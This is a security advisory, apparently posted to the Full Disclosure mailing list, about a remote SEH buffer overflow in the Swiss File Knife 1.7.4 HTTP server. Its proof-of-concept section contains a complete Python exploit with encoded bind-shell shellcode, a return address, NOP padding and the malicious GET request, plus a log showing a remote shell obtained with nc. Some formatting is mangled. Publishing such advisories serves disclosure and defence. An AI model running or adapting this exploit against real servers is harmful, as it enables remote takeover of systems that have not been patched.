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[FD] Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability
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- Subject: [FD] Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability
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- Date: Sat, 28 Feb 2015 12:08:19 +0100
Document Title:
===============
Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1441
Release Date:
=============
2015-02-27
Vulnerability Laboratory ID (VL-ID):
====================================
1441
Common Vulnerability Scoring System:
====================================
8.4
Product & Service Introduction:
===============================
Swiss File Knife - A Command Line Tools Collection that combines many functions
in a single, portable executable that belongs onto
every USB stick. Search and convert text files, instant simple FTP/HTTP server,
find duplicate files, compare folders, treesize,
run own commands on all files of a folder - it`s all within a single tool.
(Copy of the Vendor Homepage: http://stahlworks.com/dev/swiss-file-knife.html )
Abstract Advisory Information:
==============================
An indepdent vulnerability laboratory researcher discovered a buffer overflow
vulnerability in the official Swiss File Knife 1.7.4 HTTP Server software.
Vulnerability Disclosure Timeline:
==================================
2015-02-18: Vendor Fix/Patch (Developer Team)
2015-02-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Stahlworks
Product: Swiss File Knife - HTTP Server 1.7.4 (Windows, MacOS & Linux)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered by an indepdent researcher
in the official Swiss File Knife 1.7.4 HTTP Server software.
The vulnerability allows local or remote attacker to gain higher system or
access privileges by exploitation of a classic buffer overflow vulnerability.
Payload overwrites SEH with address of pop pop ret sequence, which redirects
execution flow to the attacker buffer started with fixed string “unexpected:
file
left open for write: <attacker payload>â€. First two bytes “un†- 75 6E in
hex are an opcode for JNZ SHORT sfk174.005A7AC0, which successfully jumps
over the fixed text right into attacker controlled buffer filled with nops and
finally shellcode.
The security risk of the buffer overflow vulnerability is estimated as high
with a cvss (common vulnerability scoring system) count of 8.4.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction
or privileged application user account.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Exploit Code (*.py)
!/usr/bin/env python
Swiss File Knife 1.7.4 (rev 1) Buffer Overflow
Author: lucyoa <lucyoa[at]reverse-shell.com
SFK's http server launched using following method:
C:\fuzz\sfksfk174.exe httpserv
SFK Instant HTTP Server. For help, type "sfk httpserv -help".
Waiting on port 80. Try http://192.168.56.111/ in your browser.
Exploitation:
lucyoa@sage~/exploits/sfk174$ ./exploit.py 192.168.56.111 80
lucyoa@sage~/exploits/sfk174$ nc 192.168.56.111 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\fuzz\sfkipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.111
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\fuzz\sfk
import sys
import socket
def usage(s):
print "%s <ip<port" % s
exit(0)
def main():
if len(sys.argv) != 3:
usage(sys.argv[0])
msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed
-t c
[*] x86/alpha_mixed succeeded with size 744 (iteration=1)
sc = (
"\x89\xe0\xd9\xc5\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x78\x68\x4d\x59\x63\x30\x73\x30\x67\x70\x55\x30\x4b"
"\x39\x79\x75\x35\x61\x59\x42\x42\x44\x4e\x6b\x63\x62\x56\x50"
"\x6c\x4b\x71\x42\x46\x6c\x4e\x6b\x63\x62\x64\x54\x4e\x6b\x34"
"\x32\x66\x48\x36\x6f\x38\x37\x50\x4a\x57\x56\x70\x31\x39\x6f"
"\x44\x71\x39\x50\x4c\x6c\x67\x4c\x45\x31\x53\x4c\x63\x32\x46"
"\x4c\x31\x30\x5a\x61\x6a\x6f\x76\x6d\x66\x61\x39\x57\x6d\x32"
"\x6c\x30\x46\x32\x63\x67\x4e\x6b\x43\x62\x46\x70\x6c\x4b\x67"
"\x32\x45\x6c\x77\x71\x4a\x70\x6e\x6b\x43\x70\x53\x48\x4b\x35"
"\x59\x50\x42\x54\x50\x4a\x63\x31\x78\x50\x72\x70\x4c\x4b\x67"
"\x38\x54\x58\x6c\x4b\x73\x68\x31\x30\x43\x31\x38\x53\x49\x73"
"\x65\x6c\x77\x39\x4e\x6b\x34\x74\x4c\x4b\x67\x71\x49\x46\x70"
"\x31\x59\x6f\x35\x61\x39\x50\x4c\x6c\x5a\x61\x7a\x6f\x44\x4d"
"\x35\x51\x4a\x67\x47\x48\x4b\x50\x63\x45\x78\x74\x46\x63\x31"
"\x6d\x4b\x48\x67\x4b\x63\x4d\x34\x64\x62\x55\x49\x72\x72\x78"
"\x6e\x6b\x70\x58\x71\x34\x67\x71\x79\x43\x61\x76\x6e\x6b\x44"
"\x4c\x50\x4b\x4c\x4b\x42\x78\x67\x6c\x63\x31\x68\x53\x6c\x4b"
"\x73\x34\x6e\x6b\x57\x71\x38\x50\x6d\x59\x70\x44\x37\x54\x57"
"\x54\x61\x4b\x43\x6b\x63\x51\x32\x79\x32\x7a\x32\x71\x59\x6f"
"\x6d\x30\x72\x78\x71\x4f\x32\x7a\x6c\x4b\x44\x52\x7a\x4b\x4d"
"\x56\x43\x6d\x53\x58\x75\x63\x70\x32\x67\x70\x33\x30\x63\x58"
"\x72\x57\x72\x53\x56\x52\x73\x6f\x30\x54\x43\x58\x30\x4c\x54"
"\x37\x45\x76\x56\x67\x59\x6f\x4a\x75\x4f\x48\x6e\x70\x76\x61"
"\x77\x70\x63\x30\x77\x59\x5a\x64\x33\x64\x62\x70\x75\x38\x65"
"\x79\x6f\x70\x30\x6b\x43\x30\x6b\x4f\x78\x55\x30\x50\x52\x70"
"\x72\x70\x42\x70\x31\x50\x72\x70\x57\x30\x30\x50\x62\x48\x38"
"\x6a\x66\x6f\x6b\x6f\x4b\x50\x6b\x4f\x49\x45\x4b\x39\x69\x57"
"\x55\x61\x49\x4b\x32\x73\x65\x38\x43\x32\x53\x30\x62\x31\x43"
"\x6c\x4d\x59\x59\x76\x51\x7a\x44\x50\x46\x36\x50\x57\x70\x68"
"\x5a\x62\x4b\x6b\x66\x57\x43\x57\x49\x6f\x58\x55\x62\x73\x31"
"\x47\x35\x38\x4e\x57\x4d\x39\x66\x58\x39\x6f\x4b\x4f\x59\x45"
"\x36\x33\x73\x63\x36\x37\x31\x78\x30\x74\x68\x6c\x35\x6b\x69"
"\x71\x39\x6f\x4a\x75\x62\x77\x6c\x49\x68\x47\x71\x78\x44\x35"
"\x30\x6e\x32\x6d\x71\x71\x39\x6f\x49\x45\x43\x58\x71\x73\x72"
"\x4d\x50\x64\x53\x30\x6e\x69\x4d\x33\x36\x37\x63\x67\x33\x67"
"\x46\x51\x4b\x46\x30\x6a\x55\x42\x62\x79\x50\x56\x6d\x32\x6b"
"\x4d\x45\x36\x7a\x67\x70\x44\x66\x44\x65\x6c\x65\x51\x65\x51"
"\x6c\x4d\x72\x64\x77\x54\x76\x70\x78\x46\x55\x50\x37\x34\x66"
"\x34\x56\x30\x46\x36\x53\x66\x33\x66\x43\x76\x51\x46\x32\x6e"
"\x56\x36\x63\x66\x50\x53\x71\x46\x61\x78\x70\x79\x58\x4c\x55"
"\x6f\x4d\x56\x69\x6f\x4b\x65\x4f\x79\x4b\x50\x70\x4e\x70\x56"
"\x37\x36\x69\x6f\x50\x30\x61\x78\x34\x48\x4c\x47\x35\x4d\x61"
"\x70\x59\x6f\x5a\x75\x6f\x4b\x4a\x50\x4f\x45\x49\x32\x62\x76"
"\x45\x38\x6e\x46\x6f\x65\x6f\x4d\x4d\x4d\x39\x6f\x7a\x75\x77"
"\x4c\x65\x56\x63\x4c\x76\x6a\x4f\x70\x4b\x4b\x79\x70\x44\x35"
"\x64\x45\x6f\x4b\x72\x67\x46\x73\x73\x42\x50\x6f\x72\x4a\x47"
"\x70\x32\x73\x49\x6f\x38\x55\x41\x41")
0x004f1b8d from sfk174.exe
ret = "\x8d\x1b\x4f\x00"
nop = "\x90"*(128807 - len(sc))
nop2 = "\x90"*121068
buff = nop + sc + nop2 + ret
payload = "GET /"+buff+" HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
s.send(payload)
s.close()
if __name__ == "__main__":
main()
Solution - Fix & Patch:
=======================
2015-02-18: Vendor Fix/Patch (Developer Team)
Update:
http://sourceforge.net/projects/swissfileknife/files/1-swissfileknife/1.7.4/
Security Risk:
==============
The security risk of the local and remote buffer overflow software
vulnerability is estimated as high. (CVSS 8.4)
Credits & Authors:
==================
lucyoa - [lucyoa[at]reverse-shell.com]
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